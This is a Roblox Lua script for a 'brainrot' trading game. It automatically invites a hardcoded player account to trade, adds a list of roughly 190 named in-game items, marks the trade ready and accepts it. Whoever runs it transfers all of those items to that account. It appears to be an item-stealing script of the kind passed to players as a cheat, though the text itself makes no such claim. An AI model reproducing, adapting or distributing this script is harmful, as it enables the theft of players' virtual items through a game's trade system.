local RS = game:GetService("ReplicatedStorage")

local TradeService = RS.Packages.Net

local CreateInvite = TradeService.RF.TradeService.CreateInvite
local AddBrainrot = TradeService.RF.TradeService.AddBrainrot
local Ready = TradeService.RF.TradeService.Ready
local Accept = TradeService.RE.TradeService.Accept

local targetPlayer = "JoaoMig_pn200"

local brainrots = {
"Cerberus",
"Meowl",
"Skibidi Toilet",
"Noobini Pizzanini",
"Lirili Larila",
"TIM Cheese",
"Flurifura",
"Talpa Di Fero",
"Svinia Bombardino",
"Pipi Kiwi",
"Racooni Jandelini",
"Pipi Corni",
"Noobini Santanini",
"Trippi Troppi",
"Gangster Footera",
"Bandito Bobritto",
"Boneca Ambalabu",
"Cacto Hipopotamo",
"Ta Ta Ta Ta Sahur",
"Tric Trac Baraboom",
"Pipi Avocado",
"Frogo Elfo",
"Cappuccino Assassino",
"Brr Brr Patapin",
"Trulimero Trulicina",
"Bambini Crostini",
"Bananita Dolphinita",
"Perochello Lemonchello",
"Brri Brri Bicus Dicus Bombicus",
"Avocadini Guffo",
"Salamino Penguino",
"Ti Ti Ti Sahur",
"Penguin Tree",
"Penguino Cocosino",
"Burbalini Loliloli",
"Chimpanzini Bananini",
"Ballerina Cappuccina",
"Chef Crabracadabra",
"Lionel Cactuseli",
"Glorbo Fruttodrillo",
"Blueberrini Octapusini",
"Strawberelli Flamingelli",
"Pandaccini Bananini",
"Cocosini Mama",
"Sigma Boy",
"Sigma Girl",
"Pi Pi Watermelon",
"Chocco Bunny",
"Sealo Regalo",
"Frigo Camelo",
"Orangutini Ananasini",
"Rhino Toasterino",
"Bombardiro Crocodilo",
"Bombombini Gusini",
"Cavallo Virtuso",
"Gorillo Watermelondrillo",
"Avocadorilla",
"Tob Tobi Tobi",
"Gangazelli Trulala",
"Cachorrito Melonito",
"Elefanto Frigo",
"Toiletto Focaccino",
"Te Te Te Sahur",
"Tracoducotulu Delapeladustuz",
"Lerulerulerule",
"Jingle Jingle Sahur",
"Tree Tree Tree Sahur",
"Carloo",
"Spioniro Golubiro",
"Zibra Zubra Zibralini",
"Tigrilini Watermelini",
"Carrotini Brainini",
"Bananito Bandito",
"Cocofanta Elefanto",
"Girafa Celestre",
"Gyattatino Nyanino",
"Chihuanini Taconini",
"Matteo",
"Tralalero Tralala",
"Espresso Signora",
"Odin Din Din Dun",
"Statutino Libertino",
"Trenostruzzo Turbo 3000",
"Ballerino Lololo",
"Los Orcalitos",
"Dug Dug Dug",
"Tralalita Tralala",
"Urubini Flamenguini",
"Los Bombinitos",
"Trigoligre Frutonni",
"Orcalero Orcala",
"Bulbito Bandito Traktorito",
"Los Crocodilitos",
"Piccione Macchina",
"Trippi Troppi Troppa Trippa",
"Los Tungtuntuncitos",
"Tukanno Bananno",
"Alessio",
"Tipi Topi Taco",
"Extinct Ballerina",
"Capi Taco",
"Gattito Tacoto",
"Pakrahmatmamat",
"Tractoro Dinosauro",
"Corn Corn Corn Sahur",
"Squalanana",
"Los Tipi Tacos",
"Bombardini Tortinii",
"Pop pop sahur",
"Ballerina Peppermintina",
"Yeti Claus",
"Ginger Globo",
"Frio Ninja",
"Ginger Cisterna",
"Cacasito Satalito",
"Aquanaut",
"Tartaruga Cisterna",
"Las Sis",
"La Vacca Saturno Saturnita",
"Chimpanzini_spiderini",
"Extinct Tralalero",
"Extinct Matteo",
"Los Tralaleirtos",
"La Karkerkar Combinasion",
"Karker Sahur",
"Las Tralaleritas",
"Job Job Job Sahur",
"Los Spyderinis",
"Perrito Burrito",
"Graipuss Medussi",
"Los Jobcitos",
"La Grande Combinasion",
"Tacorita Bicicleta",
"Nuclearo Dinossauro",
"Los 67",
"Money Money Puggy",
"Chillin chili",
"La Extinct Grande",
"Los Tacoritas",
"Los Tortus",
"Tang Tang Keletang",
"Garama and Madundung",
"La Secret combinasion",
"Tortuginni Dragonfruitini",
"Pot Hotspot",
"To to to Sahur",
"Las Vaquitas Saturnitas",
"Chicleteira Bicicleteira",
"Agarrini la Palini",
"Mariachi corazoni",
"Dragon Cannelloni",
"Los Combinasionas",
"La Cucaracha",
"Karkerkar Kurkur",
"Los Hotspotsitos",
"La Sahur Combinasion",
"Quesadilla Crocodila",
"Esok Sekolah",
"Lost Matteos",
"Dul Dul Dul",
"Blackhole Goat",
"Nooo My Hotspot",
"Sammyini Spyderini",
"Spaghetti Tualetti",
"67",
"Los Noo My Hotspotsitos",
"Celularcini Viciosini",
"Tralaledon",
"Tictac sahur",
"La Supreme Combinasion",
"Ketupat Kepat",
"Ketchuru and Musturu",
"Burguro and Fryuro",
"Please my Present",
"La Grande",
"La Vacca Prese Presente",
"Ho Ho Ho Sahur",
"Chicleteira Noelteira",
"Cooki and Milki",
"La Jolly Grande",
"Capitano Moby"
}

-- envia convite de trade
CreateInvite:InvokeServer(targetPlayer)

task.wait(2)

-- adiciona brainrots
for _,brainrot in pairs(brainrots) do
    AddBrainrot:InvokeServer(brainrot)
    task.wait(0.5)
end

-- confirma pronto
Ready:InvokeServer()

task.wait(13)

-- aceita a troca
Accept:FireServer()
